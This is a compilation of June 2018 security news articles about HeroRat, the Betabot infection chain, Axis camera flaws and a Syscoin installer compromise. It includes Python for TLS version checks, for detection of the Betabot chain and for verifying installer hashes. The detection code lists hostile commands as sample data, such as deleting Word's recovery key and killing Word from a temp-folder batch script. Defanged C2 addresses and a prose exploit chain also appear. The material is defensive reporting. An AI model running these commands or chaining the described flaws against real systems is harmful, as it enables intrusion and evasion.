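DEPRECATED_VERSIONS = {(3, 1), (3, 2)}


def hardened_server_context() -> ssl.SSLContext:
    """Server context that never negotiates below TLS 1.2 (Python 3.7+ API).
    A certificate must still be loaded with load_cert_chain() before use."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def client_version(client_hello: bytes) -> Tuple[int, int]:
    """Return ClientHello.client_version (major, minor) from a raw record.

    Layout: 5-byte record header (type, version, length), then the 4-byte
    handshake header (type, 3-byte length), then client_version. The record
    header version is NOT the field the draft talks about: TLS 1.2 clients
    routinely put {03,01} there for compatibility, so judging on it would
    reject modern clients."""
    if len(client_hello) < 11:
        raise ValueError("truncated record")
    if client_hello[0] != HANDSHAKE_CONTENT_TYPE:
        raise ValueError("not a handshake record")
    record_len = int.from_bytes(client_hello[3:5], "big")
    if record_len != len(client_hello) - 5:
        raise ValueError("record length mismatch")
    if client_hello[5] != CLIENT_HELLO:
        raise ValueError("not a ClientHello")
    return client_hello[9], client_hello[10]


def should_reject(client_hello: bytes) -> bool:
    """True when the draft's MUST applies: client_version is TLS 1.0 or 1.1."""
    return client_version(client_hello) in DEPRECATED_VERSIONS


def protocol_version_alert(record_version: Tuple[int, int] = (3, 3)) -> bytes:
    """The fatal protocol_version alert a server sends before closing."""
    body = bytes([ALERT_FATAL, ALERT_PROTOCOL_VERSION])
    header = bytes([ALERT_CONTENT_TYPE, *record_version]) + len(body).to_bytes(2, "big")
    return header + body


def handle_client_hello(client_hello: bytes) -> Optional[bytes]:
    """Server decision: alert bytes to send (then close) or None to proceed."""
    if should_reject(client_hello):
        return protocol_version_alert()
    return None


def build_client_hello(version: Tuple[int, int]) -> bytes:
    """Constructed minimal ClientHello used as test input (one cipher suite,
    no extensions). The record header deliberately says {03,01} regardless of
    the handshake version, mirroring what real clients send."""
    body = (bytes(version) + os.urandom(32)   # client_version + random
            + b"\x00"                         # empty session id
            + b"\x00\x02\xc0\x2f"             # one cipher suite
            + b"\x01\x00")                    # null compression only
    handshake = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    record_header = bytes([HANDSHAKE_CONTENT_TYPE, 3, 1]) + len(handshake).to_bytes(2, "big")
    return record_header + handshake


if __name__ == "__main__":
    for v in ((3, 1), (3, 2), (3, 3)):
        verdict = handle_client_hello(build_client_hello(v))
        print(f"client_version {v}: {'alert ' + verdict.hex() if verdict else 'proceed'}")
```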

The publication of TLS 1.3 will happen very soon; it is currently under final review.


HeroRAT – A totally new Telegram-based Android RAT is spreading in the wild
19.6.2018 securityaffairs Android

Malware researchers from ESET have discovered a new strain of Android RAT, tracked as HeroRat, that leverages Telegram protocol for command and control, and data exfiltration.
HeroRat isn’t the first malware abusing the Telegram protocol; past investigations reported similar threats such as TeleRAT and IRRAT.

The new RAT has been in the wild at least since August 2017, and in March 2018 its source code was released for free on Telegram hacking channels, allowing various threat actors to create their own variants.

HeroRat emerged in this context, but it appears quite different from the other variants that borrowed the source code: HeroRat is the first Telegram-based malware developed from scratch in C# using the Xamarin framework, whereas previous ones were written in Java.

The RAT leverages the Telesharp library for creating Telegram bots in C#.

“One of these variants is different from the rest – despite the freely available source code, it is offered for sale on a dedicated Telegram channel, marketed under the name HeroRat.” reads the analysis published by ESET.

“It is available in three pricing models according to functionality, and comes with a support video channel. It is unclear whether this variant was created from the leaked source code, or if it is the “original” whose source code was leaked.”

The malware is spread through several channels, including third-party app stores, social media, and messaging apps, disguised as legitimate applications.

Researchers observed the largest number of infections in Iran, where malicious apps are offered promising free bitcoins, free internet connections, and additional followers on social media.


The apps analyzed by ESET show strange behavior: after the malware is installed and launched on the victim’s device, it displays a small popup claiming the application can’t run on the device and will therefore be uninstalled.

Once the uninstallation seemingly completes, the icon associated with the app disappears; unfortunately, by then the attacker has already obtained control of the victim’s device.

The attacker leverages the Telegram bot functionality to control the infected device; the malware is able to execute a broad range of commands, including data exfiltration and audio/video recording.

“The malware has a wide array of spying and file exfiltration capabilities, including intercepting text messages and contacts, sending text messages and making calls, audio and screen recording, obtaining device location, and controlling the device’s settings,” continues the analysis.

The source code of HeroRat is offered for sale for 650 USD; the authors also offer three packages of the malware depending on the features implemented (bronze, silver, and gold), which go for 25, 50, and 100 USD, respectively.

The malware’s capabilities are accessible in the form of clickable buttons in the Telegram bot interface. Attackers can control victimized devices by simply tapping the buttons available in the version of the malware they are operating.


The availability of the source code online will drive new versions; the best way to check whether your mobile device has been infected is to scan it using a reliable mobile security solution.


Multi-Layered Infection Attack Installs Betabot Malware
19.6.2018 securityweek Virus

The Betabot Trojan is being spread in a multi-stage attack that starts with malicious Office documents attempting to exploit a 17-year-old vulnerability.

Betabot is a piece of malware that evolved from being a banking Trojan to a password stealer, and then a botnet capable of distributing ransomware and other malicious programs. Although readily available for purchase on underground markets at around $120, a cracked version of the malware was also observed in early 2017.

The recently spotted attacks start with a Word document attempting to exploit CVE-2017-11882, a vulnerability introduced in November 2000 in the Microsoft Equation Editor (EQNEDT32.EXE) component. Discovered only last year, the security bug was manually patched by Microsoft in late 2017.

As part of this attack, the actor embedded an OLE object into a specially crafted RTF file to execute commands on the victim system. The embedded objects (inteldriverupd1.sct, task.bat, decoy.doc, exe.exe, and 2nd.bat) pose as legitimate software to gain the intended victim’s trust.

The inteldriverupd1.sct file leverages Windows Script Component and creates a new object, which next runs the task.bat script to check for a block.txt file in the temp directory, create the file if it doesn’t exist, and start 2nd.bat before deleting itself.

The 2nd.bat script starts the main exe file and kills the Word process, then deletes the Resiliency directory from registry to hide its tracks and prevent recovery of the document. The script also deletes other tracks of presence. Decoy.doc is displayed to the user after infection.
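Detection logic for the chain described in the three paragraphs above, as an added example that is not from the article or the researcher: a few rules run over constructed process-creation events (Equation Editor spawning a child, batch or script components launched from the user temp directory, deletion of Word's Resiliency recovery key, and the Word process being killed). The event field names are a generic EDR/Sysmon-style layout chosen for this example, and the sample events are constructed.

```python
"""Added example (not from the article or the researcher): process-creation
rules for the CVE-2017-11882 / Betabot chain described above, run over
constructed sample events."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]


def _eqnedt_child(ev: Event) -> bool:
    # EQNEDT32.EXE only renders equations; it should never spawn a process.
    return ev["parent_image"].lower().endswith("eqnedt32.exe")


def _stager_from_temp(ev: Event) -> bool:
    # task.bat, 2nd.bat and the .sct script component all live in %TEMP%.
    cmd = ev["cmdline"].lower()
    return re.search(r'(\\temp\\|%temp%\\)[^\s"]*\.(sct|bat)\b', cmd) is not None


def _word_recovery_tampering(ev: Event) -> bool:
    # 2nd.bat deletes the Word Resiliency key to block document recovery.
    cmd = ev["cmdline"].lower()
    return re.search(r"\breg(\.exe)?\s+delete\b.*\\resiliency\b", cmd) is not None


def _kills_word(ev: Event) -> bool:
    # The same script terminates WINWORD.EXE after launching the payload.
    cmd = ev["cmdline"].lower()
    return re.search(r"\btaskkill\b.*\bwinword(\.exe)?\b", cmd) is not None


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("equation_editor_spawned_child", _eqnedt_child),
    ("stager_executed_from_temp", _stager_from_temp),
    ("word_resiliency_key_deleted", _word_recovery_tampering),
    ("word_process_killed", _kills_word),
]


def detect(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, image, rule) for every rule each event trips."""
    hits = []
    for ev in events:
        for name, predicate in RULES:
            if predicate(ev):
                hits.append((ev["ts"], ev["image"], name))
    return hits


# Constructed sample events modelled on the chain in the text. The Resiliency
# path below is Word's document-recovery key; version number is illustrative.
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS: List[Event] = [
    {"ts": "2018-06-18T09:12:01Z",
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"ts": "2018-06-18T09:12:03Z",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": rf'cmd.exe /c "{TEMP}\task.bat"'},
    {"ts": "2018-06-18T09:12:04Z",
     "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": rf'cmd.exe /c "{TEMP}\2nd.bat"'},
    {"ts": "2018-06-18T09:12:05Z",
     "image": r"C:\Windows\System32\reg.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'reg delete "HKCU\Software\Microsoft\Office\14.0\Word\Resiliency" /f'},
    {"ts": "2018-06-18T09:12:05Z",
     "image": r"C:\Windows\System32\taskkill.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "taskkill /f /im winword.exe"},
]

if __name__ == "__main__":
    for ts, image, rule in detect(SAMPLE_EVENTS):
        print(f"{ts} {rule:32} {image}")
```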

At the time of execution, the threat was observed connecting to hxxp://goog[.]com/newbuild/t.php?stats=send&thread=0, security researcher Wojciech reveals.

Written in C#, the exe.exe file shows multiple layers of obfuscation, the first being the DeepSea algorithm, followed by simple XOR and Modulo operations. Deobfuscation reveals a new file with many embedded images in its resources. These are used in the next stage.

Next, the researcher found a .Net file featuring encrypted strings. This layer is meant to decrypt another file and store it in a dictionary with other information related to the malware configuration. For that, it retrieves said images from resources, changes them into a memory stream, decrypts them, and adds them to the dictionary.

During execution, the threat also checks for the configuration from dictionary and calls the appropriate function. These functions allow it to, among others, check if it runs in a virtual environment and copy itself to the start menu.

At the last stage of the attack, a new variant of Betabot is deployed. The sample contains some anti-debugging and anti-virtualization tricks, then initiates communication with a domain, likely for tracking purposes. The researcher also noticed some redirections using said tracking values, likely meant to earn some additional money from an affiliate program.

The malware also communicates with a command and control (C&C) server at onedriveservice[.]com, which is clearly not a genuine Microsoft domain.


Google Increases Visibility Into Endpoints Accessing G Suite Data
19.6.2018 securityweek  IT

A newly added “Endpoint Verification” feature in G Suite provides administrators with increased visibility into the computers that have access to corporate data.

Released for ChromeOS, macOS, and Windows, the new feature requires a Chrome extension to be installed. On macOS and Windows, the feature also requires a native application that works with the extension.

Users can install the extensions and the apps individually and admins can deploy them centrally, if needed, Google reveals.

Once it has been set up on user devices, Endpoint Verification provides admins with access to an inventory of desktop and laptop devices within the enterprise environment that can access corporate data. Additionally, it offers information such as screen lock, disk encryption, and OS version.

Through said Chrome extensions and native apps, Endpoint Verification collects information on the users’ systems, and displays the information in a new report that becomes accessible via the Admin console.

All an admin needs to do to access the available reports is open the Admin console and visit the Device management > Endpoint Verification section.

When the Endpoint Verification extension is installed on a user’s system, a notification is displayed and the user needs to click “Agree” before the data from their device appears in the admin’s Endpoint Verification report. No data will be shown in the admin console if the user doesn’t click “Agree.”

“[Endpoint Verification is] a lightweight and easy solution for desktop and laptop device reporting, and we hope this visibility empowers admins to maintain a strong security posture for their organization,” Google notes.

The search company is launching the new feature to both Rapid Release and Scheduled Release, for all G Suite Editions. The rollout, however, will be gradual, meaning that it might take up to 15 days for the functionality to become available in some cases.


In Trump Rebuke, US Senate Votes to Reimpose Ban on China's ZTE
19.6.2018 securityweek  BigBrothers

The US Senate defied President Donald Trump by voting Monday to overrule his administration's deal with Chinese telecom firm ZTE and reimpose a ban on high-tech chip sales to the company.

Senators added an amendment targeting ZTE into a sweeping, must-pass national defense spending bill that cleared the chamber on an 85-10 vote.

The company has been on life support ever since Washington said it had banned US companies from selling crucial hardware and software components to ZTE for seven years, after staffers violated trade sanctions against Iran and North Korea.

It was fined $1.2 billion for those violations, but earlier this month the Trump administration gave ZTE a lifeline by easing sanctions in exchange for a further $1.4 billion penalty on the company.

The Senate measure nullifies that action, proposing an outright ban on the government buying products and services from ZTE and another Chinese telecoms firm, Huawei.

"We're heartened that both parties made it clear that protecting American jobs and national security must come first when making deals with countries like China, which has a history of having little regard for either," a bipartisan group of senators said.

Hong Kong-listed shares in ZTE plunged more than 20 percent soon after the opening bell on Tuesday. The company has lost around 60 percent of its value since it resumed trading last week after a two-month suspension that followed the initial ban. The lawmakers who introduced the amendment include top Democrat Chuck Schumer and Republican Marco Rubio.

Providing $716 billion in funding for national defense for fiscal year 2019 and giving policy guidance to the Pentagon, the bill is not a done deal.

The House of Representatives passed its own version of the measure, and the two chambers must now hash out a compromise.

"It is vital that our colleagues in the House keep this bipartisan provision in the bill as it heads towards a conference," Schumer and Rubio said.

ZTE, which employs 80,000 people, said recently that its major operations had "ceased" after the ban, raising the possibility of its collapse.

Its fiber-optic networks depend on US components, and its cheap smartphones, sold en masse abroad, are powered by US chips and the Android operating system.


Don’t install Fortnite Android APK because it could infect your mobile device
19.6.2018 securityaffairs Android

Fortnite is currently the most popular game, and crooks are attempting to exploit the interest in the forthcoming Fortnite Android version to infect millions of fans.
No doubt, Fortnite is currently the most popular game; it is a co-op sandbox survival game developed by Epic Games and People Can Fly.

The game was released as a paid-for early access title for Microsoft Windows, macOS, PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play release in 2018.

The Fortnite game has now more than 125 million active users.

The great success of Fortnite has attracted cyber criminals who are attempting to exploit its popularity to target the fans.

Unfortunately for Android users, Fortnite for Android devices is not available yet; it is currently under development, while the iOS version was released in March by Epic Games.


The company announced that the Battle Royale game is planned to be released for Android devices this summer.

In recent weeks, crooks have attempted to take advantage of Android users’ interest in an alleged version of the popular game for their devices.

Searching online, it is quite easy to find blog posts and video tutorials with instructions for installing a fake Fortnite Android app.

I spent an entire week explaining to my son and his friends the risks of installing APKs from untrusted sources; believe me … it was the only real battle royale of this story 🙂

Just searching for ‘Fortnite Android App’ on YouTube returns an impressive number of videos on “How to install Fortnite on Android”; many of these videos, viewed millions of times, also include links to actual Fortnite APK files.


A growing number of users are searching for Fortnite Android, as reported by Google Trends.

Scammers are exploiting this interest to trick Android fans into downloading tainted versions of the game that can compromise Android devices.

Some video tutorials that appeared online recommend that Android users “install a few other apps” to unlock the Android Fortnite game. These apps could hide any kind of code, from cryptocurrency miners to apps used to generate revenue for their developers.

Lukas Stefanko
@LukasStefanko
Millions of views on YouTube for fake "How to install Fortnite on Android" videos including links to actual APK files.
Don't install #Fortnite for Android, it's all fake or malicious! Official app is not released yet.
They mostly generate revenue for developers.

9:30 AM - Jun 12, 2018
An impressive number of links that purport to be official Fortnite app downloads are used by crooks to deliver malicious applications.

If you are a fan of the Fortnite game, you have to wait until next summer for the official Android version; in the meantime, don’t install alleged beta versions of the popular game from third-party stores.

Lukas Stefanko
@LukasStefanko
People are willing to do and believe anything to play #Fortnite on Android. pic.twitter.com/e4TASictqW

9:59 AM - Jun 12, 2018
Even if you see a Fortnite Android version in the official Google Play store, do not download it; unfortunately, scammers are able to deploy fake apps on the official store as well.


Hacking more than 400 Axis camera models by chaining 3 flaws
19.6.2018 securityaffairs
Vulnerability

Researchers from cybersecurity firm VDOO have discovered several vulnerabilities affecting nearly 400 security cameras from Axis Communications.
Researchers from cybersecurity firm VDOO have conducted a study on IoT devices and discovered seven vulnerabilities in cameras manufactured by Axis Communications. According to the vendor, nearly 400 models are affected by the issues, and Axis has released security patches for each flaw.

An attacker who knows a camera’s IP address can remotely take it over. By exploiting the flaws it is possible to access and freeze the video stream, control every function of the camera (e.g. motion detection, direction) and also alter its software.

Experts warn that an attacker can compromise cameras to recruit them into a botnet that could be used to power a broad range of attacks, such as DDoS and cryptocurrency mining.

“One of the vendors for which we found vulnerable devices was Axis Communications. Our team discovered a critical chain of vulnerabilities in Axis security cameras. The vulnerabilities allow an adversary that obtained the camera’s IP address to remotely take over the cameras (via LAN or internet). In total, VDOO has responsibly disclosed seven vulnerabilities to Axis security team.” reads the analysis published by VDOO.

“Chaining three of the reported vulnerabilities together, allows an unauthenticated remote attacker that has access to the camera login page through the network (without any previous access to the camera or credentials to the camera) to fully control the affected camera.”

The experts published technical details for each issue and related proof-of-concept (PoC) code.

The researchers demonstrated that chaining three vulnerabilities makes it possible to hack Axis cameras: bypassing authentication (CVE-2018-10661), sending specially crafted requests as root (CVE-2018-10662), and then injecting arbitrary shell commands (CVE-2018-10660).

Below is the attack sequence demonstrated by the researchers:

Step 1: The attacker uses an authorization bypass vulnerability (CVE-2018-10661) to send unauthenticated HTTP requests that reach the .srv functionality (that handles .srv requests) inside /bin/ssid. Normally, this functionality should only be accessible to administrative users.
Step 2: The attacker then utilizes an interface that allows sending any dbus message to the device’s bus, without restriction (CVE-2018-10662), that is reachable from /bin/ssid’s .srv. Due to the fact that /bin/ssid runs as root, these dbus messages are authorized to invoke most of the system’s dbus-services’ interfaces (that were otherwise subject to a strict authorization policy). The attacker chooses to send dbus messages to one such dbus-service’s interface – PolicyKitParhand, which offers functions for setting parhand parameters. The attacker now has control over any of the device’s parhand parameter values. (See the next vulnerability).
Step 3: A shell command injection vulnerability (CVE-2018-10660) is then exploited. Some parhand parameters (of type “Shell-Mounted”) end up in configuration files in shell variable assignment format, which are later included in a service’s init-script that runs as root. Due to step 2, the attacker is able to send unauthenticated requests to set parhand parameter values. By doing so, the attacker can now exploit this vulnerability by setting one parameter’s value with special characters which will cause command injection, in order to execute commands as the root user.
The remaining vulnerabilities discovered by VDOO can be exploited by unauthenticated attackers to obtain information from memory or to trigger a DoS condition.


Axis published a security advisory that includes the complete list of all impacted cameras and the firmware versions that address the vulnerabilities.

As part of the same study on the security of IoT devices, researchers at VDOO discovered several vulnerabilities in Foscam cameras.


Compromised GitHub Account Spreads Malicious Syscoin Installers
18.6.2018 securityweek 
Virus 

Malware-laden Syscoin releases were up for download on an official GitHub repository after hackers managed to compromise an account and replace legitimate Windows installers.

The malicious releases were posted on the Syscoin GitHub release page on June 9 and remained there until June 13. Only the Windows Syscoin 3.0.4.1 installers (syscoincore-3.0.4-win32-setup.exe and syscoincore-3.0.4-win64-setup.exe) were affected.

In a security notice published on Syscoin’s official account on the soon-to-be Microsoft-owned GitHub, the developers explain that the malicious code included in the modified installers is detected as Trojan:Win32/Feury.B!cl.

Mac and Linux releases were not modified by the hackers. Windows users who downloaded the ZIP files weren’t affected either (all users who did not download or execute the Syscoin 3.0.4.1 setup binaries are safe).

“This may affect Windows users who downloaded and executed the Syscoin 3.0.4.1 Windows setup binaries from Github between June 09th, 2018 10:14 PM UTC & June 13th, 2018 10:23 PM UTC,” the security notice reads.

“Please be aware this exploit method could potentially affect other blockchain projects on Github,” Blockchain Foundry notes in the Syscoin 3.0.5’s release announcement.

Windows users are advised to check the installation date for their Syscoin and make sure they did not download and execute releases containing the malicious code.

If the modified/installation date is between June 9, 2018, and June 13, 2018, users are advised to back up important data (including wallets), make sure it does not contain infectious code, and then scan their system with an anti-virus application.

They should also change passwords entered in the timeframe (the malware is a keylogger) and secure any funds stored in “unencrypted wallets or wallets that had been unlocked during the infection period.”

Windows users who downloaded the corrupted binaries are also advised to run a GenericKD Trojan removal guide before restarting the system, as the Trojan might log entered passwords.

The hack was discovered after the Blockchain Foundry team received reports that the syscoincore-3.0.4-win64-setup.exe binary was being flagged as a potential virus by Windows Defender SmartScreen, AVG, and Kaspersky.

“Investigation into the issue revealed the original Github Windows setup binaries for release 3.0.4.1 had been modified and replaced with a malicious version through a compromised Github account. Upon discovery, the 3.0.4.1 setup binaries were removed from Github and replaced with official, signed versions of the binaries,” Syscoin reveals.

The malicious binaries were immediately removed from the repository and replaced with the legitimate ones. To prevent similar incidents, Syscoin developers and Blockchain Foundry staff with Github access are now required to have 2-step authentication enabled, to routinely check signature hashes, and to “work with Github to ensure users will be able to detect if binaries have been altered after release.”
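The two checks the notice recommends, comparing a downloaded installer against published hashes and flagging copies fetched inside the June 9 to June 13 window, as an added Python example that is not Syscoin's or Blockchain Foundry's own code. The installer bytes and the sha256sum-style checksum list are constructed placeholders; in practice the list must itself come from a signature-verified source (for instance a Gitian-signed release process as mentioned above), since a hash match against an attacker-supplied list proves nothing.

```python
"""Verify a downloaded release installer against a published checksum list and
flag copies whose timestamp falls inside an announced compromise window.

Added example, not Syscoin's or Blockchain Foundry's code. The checksum list
uses the ``<sha256>  <filename>`` format written by ``sha256sum``; the
installer bytes and checksum list below are constructed for illustration."""
import hashlib
import hmac
from datetime import datetime, timezone

# Compromise window from the Syscoin security notice (UTC), as POSIX seconds.
WINDOW_START = int(datetime(2018, 6, 9, 22, 14, tzinfo=timezone.utc).timestamp())
WINDOW_END = int(datetime(2018, 6, 13, 22, 23, tzinfo=timezone.utc).timestamp())


def sha256_hex(data):
    """SHA-256 of an in-memory artifact as a lowercase hex string."""
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size=1 << 20):
    """SHA-256 of a file on disk, streamed so large installers need not be loaded whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_checksums(text):
    """Parse sha256sum-style lines into {filename: hexdigest}.

    Malformed lines raise instead of being skipped: a silently dropped entry
    would make a published file look like an unknown one."""
    expected = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, sep, name = line.partition("  ")
        name = name.strip().lstrip("*")  # sha256sum marks binary mode with '*'
        if not sep or len(digest) != 64 or not name:
            raise ValueError(f"malformed checksum line: {raw!r}")
        try:
            int(digest, 16)
        except ValueError:
            raise ValueError(f"non-hex digest in line: {raw!r}") from None
        expected[name] = digest.lower()
    return expected


def in_compromise_window(mtime, start=WINDOW_START, end=WINDOW_END):
    """True when a file timestamp (POSIX seconds) lies inside the window."""
    return start <= mtime <= end


def check_release(name, digest, mtime, checksums):
    """Classify one downloaded artifact.

    name      -- file name as published on the release page
    digest    -- SHA-256 hex of the local copy
    mtime     -- local copy's modification time, POSIX seconds
    checksums -- {filename: hexdigest} from the published, signature-verified list
    Returns the individual findings plus an overall verdict."""
    expected = checksums.get(name)
    matches = expected is not None and hmac.compare_digest(expected, digest.lower())
    in_window = in_compromise_window(mtime)
    if expected is None:
        verdict = "unknown-artifact"   # nothing published to compare against
    elif matches:
        verdict = "verified"           # hash equals the published one
    elif in_window:
        verdict = "suspect-tampered"   # mismatch and fetched inside the window
    else:
        verdict = "hash-mismatch"      # mismatch outside the window: still do not run it
    return {"file": name, "known_hash": expected is not None,
            "hash_matches": matches, "in_window": in_window, "verdict": verdict}


# --- Constructed sample data (not real Syscoin binaries or hashes) -----------
GOOD_BYTES = b"MZ constructed stand-in for syscoincore-3.0.4-win64-setup.exe\n"
TAMPERED_BYTES = GOOD_BYTES + b"constructed extra bytes standing in for a modified build\n"
SAMPLE_CHECKSUMS = (
    "# constructed checksum list in sha256sum format\n"
    f"{sha256_hex(GOOD_BYTES)}  syscoincore-3.0.4-win64-setup.exe\n"
)

if __name__ == "__main__":
    table = parse_checksums(SAMPLE_CHECKSUMS)
    fetched_in_window = 1528588800  # 2018-06-10 00:00 UTC, inside the window
    for data in (GOOD_BYTES, TAMPERED_BYTES):
        result = check_release("syscoincore-3.0.4-win64-setup.exe",
                               sha256_hex(data), fetched_in_window, table)
        print(result["verdict"], result)
```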

“Although the issue was detected quickly, we believe that the crypto-community is at risk for a specific type of attack which targets gatekeepers of source code for cryptocurrency projects. We highly recommend that all gatekeepers of software repositories for cryptocurrency projects sign binaries through an official build process like Gitian,” Syscoin notes.


F-Secure Acquires MWR InfoSecurity for $106 Million
18.6.2018 securityweek IT

Finland-based F-Secure announced on Monday that it has entered an agreement to acquire cybersecurity consultancy MWR InfoSecurity for over €91.6 million ($106 million) in cash and the promise of a significant earn-out if business objectives are achieved by the end of 2019.

Specifically, in addition to the €91.6 million ($106 million), which is subject to adjustments, F-Secure has agreed to pay up to €28.6 million ($33 million) if the agreed business target is achieved between July 1, 2018, and December 31, 2019.

The acquisition is expected to be completed in early July. F-Secure is still evaluating the impact of the acquisition on the company’s financial outlook for 2018.

MWR has nearly 400 employees across offices in the UK, the US, South Africa and Singapore. The company estimates that its revenue for the financial year ending on June 30 will be €31.1 million ($36 million).

The deal is part of F-Secure’s growth strategy, allowing the company to expand its services offering to global markets. The acquisition of MWR also results in the addition of the Countercept threat hunting platform to F-Secure’s detection and response offering. The company’s portfolio will also be enhanced by MWR’s managed phishing protection services.

“The acquisition brings MWR InfoSecurity’s industry-renowned technologies to F-Secure making our detection and response offering unrivaled. Their threat hunting platform (Countercept) is one of the most advanced in the market and is an excellent complement to our existing technologies,” said F-Secure CEO Samu Konttinen.

“I’m thrilled to welcome MWR InfoSecurity’s employees to F-Secure. With their vast experience and hundreds of experts performing cyber security services on four continents, we will have unparalleled visibility into real-life cyber attacks 24/7. This enables us to detect indicators across an incredible breadth of attacks so we can protect our customers effectively. As most companies currently lack these capabilities, this represents a significant opportunity to accelerate F-Secure’s growth,” Konttinen added.


UK Email Threat Firm Tessian Secures $13 Million Series A Funding
18.6.2018 securityweek IT

London, UK-based start-up Tessian has raised $13 million in a Series A funding round led by Balderton Capital. Existing investors Accel, Amadeus Capital Partners, Crane, LocalGlobe, Winton Ventures and Walking Ventures also participated. It brings Tessian's total funding, including initial Angel investments and seed funding, to $16.8 million.

Tessian uses machine learning to prevent sensitive data leakage via email. It was founded in 2013 by Tom Adams, Ed Bishop and Tim Sadler, who first met as students at Imperial College, London before moving on to careers in investment banking. It was there that they realized the extent and danger of accidental data leakage via email -- and saw a market gap for a preventative product.

Data from the UK's data protection regulator, the Information Commissioner's Office (ICO) shows the single greatest category of reported data security incidents in the UK during the first quarter of 2018 was data sent by email to the wrong person. With the likelihood of such incidents attracting more attention and potentially greater fines under GDPR (effective from May 2018), it is a simple business error that needs to be addressed.

"It's human nature to fear scary things like hackers or malware," explains Sadler, "but we often don't think twice about the dangers behind something as familiar and ingrained as sending an email. In reality that's where an overwhelming threat lies."

"What Tessian has done," comments Balderton Capital partner Suranga Chandratillake, "is apply machine intelligence to understand how humans communicate with each other and use that deeper understanding to secure enterprise email networks." As an investor he sees great potential for expanding the approach into other forms of human business communication. "The genius of this approach," he continues, "is that while the product focus today is on email -- by far the most used communication channel in the corporate enterprise -- their technology can be applied to all communication channels in time. And, as we all communicate in larger volumes and on more channels, that represents a vast opportunity."

Both Chandratillake and Accel partner Luciana Lixandru will join the Tessian board. "Since our seed investment just over a year ago," she said, "the company's ability to address a fundamental data security risk has been reflected in its strong growth and a string of blue chip client wins."

That growth has seen annual recurring revenue increase by 400% in the last twelve months, with staff levels increasing from 13 to 50 people. Clients include Schroders, Man Group and Dentons and over 70 UK law firms.

Chris White, global CIO at international law firm Clyde & Co LLP, commented, "Misaddressed emails are a major cybersecurity problem that all organizations have to deal with, but trying to train human error out of employees is near impossible. Tessian's machine intelligence plays a vital role in helping mitigate these kinds of errors and ensure that customer data remains secure and private. The speed and ease of deployment of Tessian," he added, "has been unparalleled by any other solution we've dealt with, and has been our quickest GDPR win to date."

Tessian uses machine learning to understand normal email communication patterns and automatically identify email security threats in real time. It analyzes enterprise email networks to understand normal and abnormal email sending patterns and behaviors, detects anomalies in outbound emails and warns users about potential mistakes, before the email is sent.

"Our belief at Tessian," co-founder and CTO Ed Bishop told SecurityWeek, "is that organizations' security has moved on from perimeter firewalls, and even endpoint security. I think we are in a third phase here, where humans are the real endpoints of the organization." If you look at how hackers try to break into a company, they're not so much hacking devices as hacking the humans.

"We are focused on building security for the human endpoint," he continued. "In short, we are thinking not just about outbound email threats, but also inbound email threats; and in going beyond that to understand what are the other ways in which humans leak data within an enterprise."

The new funding will be used to expand its product offering and increase its sales and marketing teams. It is likely that the product will be expanded to directly address the BEC and phishing threats before the firm moves on to other forms of business communication.


DHS, FBI Share Details of North Korea's 'Typeframe' Malware
18.6.2018 securityweek  BigBrothers

The U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) have published another report on the US-CERT website detailing a piece of malware allegedly used by the North Korean government.

A dozen reports have been published by the DHS and the FBI over the past year on the North Korea-linked threat group tracked by the U.S. government as Hidden Cobra. The list of tools detailed by the agencies includes Sharpknot, Hardrain, Badcall, Bankshot, Fallchil, Volgmer, and Delta Charlie.

The latest report describes a piece of malware dubbed “Typeframe” and it covers a total of 11 samples related to the threat, including executable files and malicious Word documents containing VBA macros.

“These files have the capability to download and install malware, install proxy and Remote Access Trojans (RATs), connect to command and control (C2) servers to receive additional instructions, and modify the victim's firewall to allow incoming connections,” the agencies said.

The alert contains indicators of compromise (IoCs) for each of the files, including a description of their functionality, hashes, IPs, antivirus detections, metadata, and YARA rules.

The goal of the report is to “enable network defense and reduce exposure to North Korean government malicious cyber activity.” However, security experts argued in the past that these types of alerts from government agencies are actually not enough to help improve defenses.

The previous Hidden Cobra report, published on the US-CERT website in late May, attributed the Joanap backdoor trojan and the Brambul worm to the North Korean government.

While it has always denied accusations, experts say North Korea continues to be highly active in cyberspace, with some claiming that the country is even more aggressive than China. Recent attacks attributed to North Korea involved new malware and even zero-day vulnerabilities.


Critical Flaws Expose 400 Axis Cameras to Remote Attacks
18.6.2018 securityweek  
Vulnerability

Roughly 400 security cameras from Axis Communications are affected by several vulnerabilities, including critical flaws that can be chained to take complete control of a device and access its video stream.

As part of its research into IoT devices, cybersecurity firm VDOO has uncovered a total of seven vulnerabilities in cameras made by Axis. The vendor has identified nearly 400 affected models and released patches for each of them.

According to VDOO, an attacker who knows the targeted camera’s IP address can remotely and without authentication take full control of the device. This includes accessing its video stream, freezing the video stream, controlling the direction and functions of the camera (e.g. motion detection), adding the device to a botnet, altering its software, leveraging it for lateral movement within the network, abusing it for DDoS attacks and cryptocurrency mining, and rendering the camera useless.

There are three vulnerabilities that can be chained to remotely hack a device. These allow an attacker to bypass authentication (CVE-2018-10661), send specially crafted requests as root (CVE-2018-10662), and inject arbitrary shell commands (CVE-2018-10660).

